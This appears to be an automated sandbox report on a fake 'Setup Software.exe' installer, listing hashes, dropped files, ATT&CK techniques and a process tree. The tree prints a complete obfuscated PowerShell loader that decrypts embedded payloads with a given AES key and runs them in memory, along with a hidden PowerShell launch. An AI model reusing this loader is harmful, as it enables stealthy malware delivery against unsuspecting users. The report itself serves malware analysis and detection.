6d531e627d1474d4fbd1cc669af856f3c04182a9172ad1e73e679d8a206479f5

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
17/10/2024, 15:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup Software.exe
Size

23.8MB
MD5

24bd5fb6e20496abbf7497999e4dd6bb
SHA1

04f87a82c651fd9cb9ba43a9cb31c93c137d682c
SHA256

6d531e627d1474d4fbd1cc669af856f3c04182a9172ad1e73e679d8a206479f5
SHA512

eacf0fa7b896615b7440d7a246caba05f16855bfa1ce38d2c1d4133e9171934fe08657fb3842ac23f5e3a2904dfc3405a7f438ff7f8ff18ed28a9917c8337eca
SSDEEP

393216:yFx5mLMvl0z2kFAaZa73fLNFKhM7f/u1E3t3Ghsry/i:ox8YvTkAaQzK27fW1E39x

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2664	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1188	exp1.bat.exe

Loads dropped DLL 8 IoCs

pid	Process
2896	MsiExec.exe
2628	MsiExec.exe
2628	MsiExec.exe
2628	MsiExec.exe
2628	MsiExec.exe
2628	MsiExec.exe
2628	MsiExec.exe
2628	MsiExec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\W:	Setup Software.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	Setup Software.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\U:	Setup Software.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	Setup Software.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	Setup Software.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\J:	Setup Software.exe
File opened (read-only)	\??\N:	Setup Software.exe
File opened (read-only)	\??\S:	Setup Software.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\R:	Setup Software.exe
File opened (read-only)	\??\V:	Setup Software.exe
File opened (read-only)	\??\Z:	Setup Software.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	Setup Software.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	Setup Software.exe
File opened (read-only)	\??\O:	Setup Software.exe
File opened (read-only)	\??\Y:	Setup Software.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\M:	Setup Software.exe
File opened (read-only)	\??\P:	Setup Software.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	Setup Software.exe
File opened (read-only)	\??\I:	Setup Software.exe
File opened (read-only)	\??\L:	Setup Software.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	exp1.bat.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File created	C:\Windows\Installer\f7668a2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI693F.tmp	msiexec.exe
File created	C:\Windows\Installer\f7668a7.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f7668a5.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI68F0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI699E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6A0C.tmp	msiexec.exe
File created	C:\Windows\Installer\f7668a5.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6BC2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f7668a2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6BE2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6C51.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7FF1.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	exp1.bat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup Software.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1188	exp1.bat.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2168	msiexec.exe
2168	msiexec.exe
2664	powershell.exe
1188	exp1.bat.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2168	msiexec.exe
Token: SeTakeOwnershipPrivilege	2168	msiexec.exe
Token: SeSecurityPrivilege	2168	msiexec.exe
Token: SeCreateTokenPrivilege	2160	Setup Software.exe
Token: SeAssignPrimaryTokenPrivilege	2160	Setup Software.exe
Token: SeLockMemoryPrivilege	2160	Setup Software.exe
Token: SeIncreaseQuotaPrivilege	2160	Setup Software.exe
Token: SeMachineAccountPrivilege	2160	Setup Software.exe
Token: SeTcbPrivilege	2160	Setup Software.exe
Token: SeSecurityPrivilege	2160	Setup Software.exe
Token: SeTakeOwnershipPrivilege	2160	Setup Software.exe
Token: SeLoadDriverPrivilege	2160	Setup Software.exe
Token: SeSystemProfilePrivilege	2160	Setup Software.exe
Token: SeSystemtimePrivilege	2160	Setup Software.exe
Token: SeProfSingleProcessPrivilege	2160	Setup Software.exe
Token: SeIncBasePriorityPrivilege	2160	Setup Software.exe
Token: SeCreatePagefilePrivilege	2160	Setup Software.exe
Token: SeCreatePermanentPrivilege	2160	Setup Software.exe
Token: SeBackupPrivilege	2160	Setup Software.exe
Token: SeRestorePrivilege	2160	Setup Software.exe
Token: SeShutdownPrivilege	2160	Setup Software.exe
Token: SeDebugPrivilege	2160	Setup Software.exe
Token: SeAuditPrivilege	2160	Setup Software.exe
Token: SeSystemEnvironmentPrivilege	2160	Setup Software.exe
Token: SeChangeNotifyPrivilege	2160	Setup Software.exe
Token: SeRemoteShutdownPrivilege	2160	Setup Software.exe
Token: SeUndockPrivilege	2160	Setup Software.exe
Token: SeSyncAgentPrivilege	2160	Setup Software.exe
Token: SeEnableDelegationPrivilege	2160	Setup Software.exe
Token: SeManageVolumePrivilege	2160	Setup Software.exe
Token: SeImpersonatePrivilege	2160	Setup Software.exe
Token: SeCreateGlobalPrivilege	2160	Setup Software.exe
Token: SeCreateTokenPrivilege	2160	Setup Software.exe
Token: SeAssignPrimaryTokenPrivilege	2160	Setup Software.exe
Token: SeLockMemoryPrivilege	2160	Setup Software.exe
Token: SeIncreaseQuotaPrivilege	2160	Setup Software.exe
Token: SeMachineAccountPrivilege	2160	Setup Software.exe
Token: SeTcbPrivilege	2160	Setup Software.exe
Token: SeSecurityPrivilege	2160	Setup Software.exe
Token: SeTakeOwnershipPrivilege	2160	Setup Software.exe
Token: SeLoadDriverPrivilege	2160	Setup Software.exe
Token: SeSystemProfilePrivilege	2160	Setup Software.exe
Token: SeSystemtimePrivilege	2160	Setup Software.exe
Token: SeProfSingleProcessPrivilege	2160	Setup Software.exe
Token: SeIncBasePriorityPrivilege	2160	Setup Software.exe
Token: SeCreatePagefilePrivilege	2160	Setup Software.exe
Token: SeCreatePermanentPrivilege	2160	Setup Software.exe
Token: SeBackupPrivilege	2160	Setup Software.exe
Token: SeRestorePrivilege	2160	Setup Software.exe
Token: SeShutdownPrivilege	2160	Setup Software.exe
Token: SeDebugPrivilege	2160	Setup Software.exe
Token: SeAuditPrivilege	2160	Setup Software.exe
Token: SeSystemEnvironmentPrivilege	2160	Setup Software.exe
Token: SeChangeNotifyPrivilege	2160	Setup Software.exe
Token: SeRemoteShutdownPrivilege	2160	Setup Software.exe
Token: SeUndockPrivilege	2160	Setup Software.exe
Token: SeSyncAgentPrivilege	2160	Setup Software.exe
Token: SeEnableDelegationPrivilege	2160	Setup Software.exe
Token: SeManageVolumePrivilege	2160	Setup Software.exe
Token: SeImpersonatePrivilege	2160	Setup Software.exe
Token: SeCreateGlobalPrivilege	2160	Setup Software.exe
Token: SeCreateTokenPrivilege	2160	Setup Software.exe
Token: SeAssignPrimaryTokenPrivilege	2160	Setup Software.exe
Token: SeLockMemoryPrivilege	2160	Setup Software.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2160	Setup Software.exe
2748	msiexec.exe
2748	msiexec.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2896	2168	msiexec.exe	31
PID 2168 wrote to memory of 2896	2168	msiexec.exe	31
PID 2168 wrote to memory of 2896	2168	msiexec.exe	31
PID 2168 wrote to memory of 2896	2168	msiexec.exe	31
PID 2168 wrote to memory of 2896	2168	msiexec.exe	31
PID 2168 wrote to memory of 2896	2168	msiexec.exe	31
PID 2168 wrote to memory of 2896	2168	msiexec.exe	31
PID 2160 wrote to memory of 2748	2160	Setup Software.exe	32
PID 2160 wrote to memory of 2748	2160	Setup Software.exe	32
PID 2160 wrote to memory of 2748	2160	Setup Software.exe	32
PID 2160 wrote to memory of 2748	2160	Setup Software.exe	32
PID 2160 wrote to memory of 2748	2160	Setup Software.exe	32
PID 2160 wrote to memory of 2748	2160	Setup Software.exe	32
PID 2160 wrote to memory of 2748	2160	Setup Software.exe	32
PID 2168 wrote to memory of 2628	2168	msiexec.exe	33
PID 2168 wrote to memory of 2628	2168	msiexec.exe	33
PID 2168 wrote to memory of 2628	2168	msiexec.exe	33
PID 2168 wrote to memory of 2628	2168	msiexec.exe	33
PID 2168 wrote to memory of 2628	2168	msiexec.exe	33
PID 2168 wrote to memory of 2628	2168	msiexec.exe	33
PID 2168 wrote to memory of 2628	2168	msiexec.exe	33
PID 2168 wrote to memory of 2184	2168	msiexec.exe	34
PID 2168 wrote to memory of 2184	2168	msiexec.exe	34
PID 2168 wrote to memory of 2184	2168	msiexec.exe	34
PID 2184 wrote to memory of 2664	2184	cmd.exe	36
PID 2184 wrote to memory of 2664	2184	cmd.exe	36
PID 2184 wrote to memory of 2664	2184	cmd.exe	36
PID 2184 wrote to memory of 1188	2184	cmd.exe	37
PID 2184 wrote to memory of 1188	2184	cmd.exe	37
PID 2184 wrote to memory of 1188	2184	cmd.exe	37
PID 2184 wrote to memory of 1188	2184	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\Setup Software.exe
"C:\Users\Admin\AppData\Local\Temp\Setup Software.exe"
1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software 10.24.1\install\ED3984D\S.R.L. Software.msi" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Setup Software.exe" SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1728919742 " AI_EUIMSI=""
  2⤵
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:2748

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C1247D85C7A4A705E117437CB2A30071 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2896
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 15BA1BB7FCCEF1C8DB4397245189E15E
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2628
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software\exp1.bat" /install /quiet /norestart"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w hidden -c #
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2664
- - C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software\exp1.bat.exe
    "C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software\exp1.bat.exe" function Bm($n){$n.Replace('Riksr', '')}$cKZC=Bm 'ChanRiksrgeExRiksrtRiksrensRiksrioRiksrnRiksr';$IJEl=Bm 'InRiksrvoRiksrkeRiksr';$pnkn=Bm 'LoRiksraRiksrdRiksr';$YwMW=Bm 'CreRiksrateRiksrDeRiksrcrRiksrypRiksrtoRiksrrRiksr';$zKUA=Bm 'FroRiksrmBaRiksrse6Riksr4SRiksrtrRiksrinRiksrgRiksr';$oCMc=Bm 'EnRiksrtryRiksrPRiksroiRiksrntRiksr';$GAeW=Bm 'RRiksreadRiksrLinRiksresRiksr';$LRBO=Bm 'FirRiksrstRiksr';$XSXj=Bm 'TrRiksraRiksrnsfRiksroRiksrrmRiksrFRiksrinaRiksrlRiksrBlRiksrocRiksrkRiksr';$vizH=Bm 'GetRiksrCurRiksrreRiksrntPRiksrrocRiksresRiksrsRiksr';function PCiNw($dQXOR){$PcplD=[System.Security.Cryptography.Aes]::Create();$PcplD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PcplD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PcplD.Key=[System.Convert]::$zKUA('XHAc6uN/C2qu8lqQ8Tc+TOX/hCrdY4onN101A1I1eMM=');$PcplD.IV=[System.Convert]::$zKUA('PIgZC5AXEmQxBP2h1Wgrlg==');$eWaBR=$PcplD.$YwMW();$Sseam=$eWaBR.$XSXj($dQXOR,0,$dQXOR.Length);$eWaBR.Dispose();$PcplD.Dispose();$Sseam;}function xbbOH($dQXOR){$sdAWu=New-Object System.IO.MemoryStream(,$dQXOR);$MWrPp=New-Object System.IO.MemoryStream;$qwBOk=New-Object System.IO.Compression.GZipStream($sdAWu,[IO.Compression.CompressionMode]::Decompress);$qwBOk.CopyTo($MWrPp);$qwBOk.Dispose();$sdAWu.Dispose();$MWrPp.Dispose();$MWrPp.ToArray();}function GlIBa($dQXOR,$DaASB){[System.Reflection.Assembly]::$pnkn([byte[]]$dQXOR).$oCMc.$IJEl($null,$DaASB);}$GqUFZ=[System.Linq.Enumerable]::$LRBO([System.IO.File]::$GAeW([System.IO.Path]::$cKZC([System.Diagnostics.Process]::$vizH().MainModule.FileName, $null)));$BnDZd = $GqUFZ.Substring(3).Split('\');$rDwBA=xbbOH (PCiNw ([Convert]::$zKUA($BnDZd[0])));$bOnOx=xbbOH (PCiNw ([Convert]::$zKUA($BnDZd[1])));GlIBa $bOnOx $null;GlIBa $rDwBA $null;
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    PID:1188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f7668a6.rbs

Filesize
1.2MB

MD5
23292477e25beb259e01effbfb504f3f

SHA1
18c98d738cc071283fec3bb554558d09c69191cc

SHA256
8b50b89222285ef96609d252a90da42d524747def0fd68bf15fd2c6f964a1f57

SHA512
1656e23df6b324c9331ef35882c50ca18c3c45889bcce3f37dc681749e8929a1af9abce2930bc81b3bb59a38758b56656dfa23a7ae1b9397bb1bc64c4ed9aa44

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI677A.tmp

Filesize
557KB

MD5
2c9c51ac508570303c6d46c0571ea3a1

SHA1
e3e0fe08fa11a43c8bca533f212bdf0704c726d5

SHA256
ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550

SHA512
df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127

Download Submit
C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software 10.24.1\install\ED3984D\S.R.L. Software.msi

Filesize
2.7MB

MD5
967b13665d2fa2e71b5e6eebe3ff50c9

SHA1
5d1fb97d04141e926e4c24d0b1d8d222bf5c1b06

SHA256
d64db75466148261f139409c5e22517a79fe7d0c1410f5d355f904e1af0f61a6

SHA512
7e64445d98c8732ee0b6f699e003a9f8ca85fb59a6ce838bfdd3d0a6f9ca25538b5317ec3d51a64fefcf56aab0f73d1a9f4e00e38ff93557b8a855145805aed7

Download Submit
C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software 10.24.1\install\ED3984D\TempFolder\FC_Loader.vbs

Filesize
101B

MD5
0832d836af4ddb7b2c7107386c161762

SHA1
7a02f17df9afb3d006532b2e5b8df4fddc368e38

SHA256
d2202bfe35af8f2c24c666debdc0d607039d2e41a65d6b9b015fca59b0b6dadd

SHA512
440239c1f591eb4179e3e5e3e6ef96b65942891e280031f431083a66ff0c196c5bc91023dcbbf29b8442763b2b906f13f22e57076a68109fdb4b7e969f7334e4

Download Submit
C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software 10.24.1\install\ED3984D\exp1.bat

Filesize
90KB

MD5
b02bcc615ba89266f10b0af4bcd28390

SHA1
482d700f81c3480fa9fc0bbe9b194dd4c96fbd8f

SHA256
f838ec5a4b277133a578605e8bdd0be7fbeb6d97f4d2b7cddddeaf947327a02b

SHA512
6ccf7df67ac93628590d90a4fd161a5d8985d28ef69f16bc6e55ec1f568760e3e1f50d26dcddedd8f6df5a6bc946fa81eb3061c9c91d803fa3c451e4ad8e009b

Download Submit
C:\Users\Admin\AppData\Roaming\AJAB Software\S.R.L. Software\exp1.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\Windows\Installer\MSI6BE2.tmp

Filesize
614KB

MD5
8888fe82ff353145f7a0066f225af63d

SHA1
2c332d406f23a124e28eae090606039bb13f497c

SHA256
b034ea35c1cf08e216001c0e2ee1a29227f60fe8ff8fc9122e37046bf34734a6

SHA512
beae1ec2ed19a5dfe7e90bf499d2f1af82a3f3148cbcb63339051661719094fe4c7279f03c1bc7c344ebd6c2bd40b146f6c35a142fd3bd20fb71217b768d6ca6

Download Submit
\Windows\Installer\MSI6A0C.tmp

Filesize
705KB

MD5
e361f7bfaac80ff5bac709905d6b1a16

SHA1
724d294983509fd37cf282403e25f26890fbfc8f

SHA256
44cfe8ece8a14c06bc0c953176680623e802769b921f39b86647b541ef1eb06d

SHA512
47b7d7beb22484b67f05a3dbf28f78e3c55f1ff07204eac613e6912f82c713e4e8622d5f40a6a04731f6a9e0e5ab15e05b132493a4b06f882532a470a4bddedf

Download Submit
memory/2160-0-0x00000000002E0000-0x00000000002E1000-memory.dmp

Filesize
4KB

Download
memory/2664-64-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2664-65-0x0000000002620000-0x0000000002628000-memory.dmp

Filesize
32KB

Download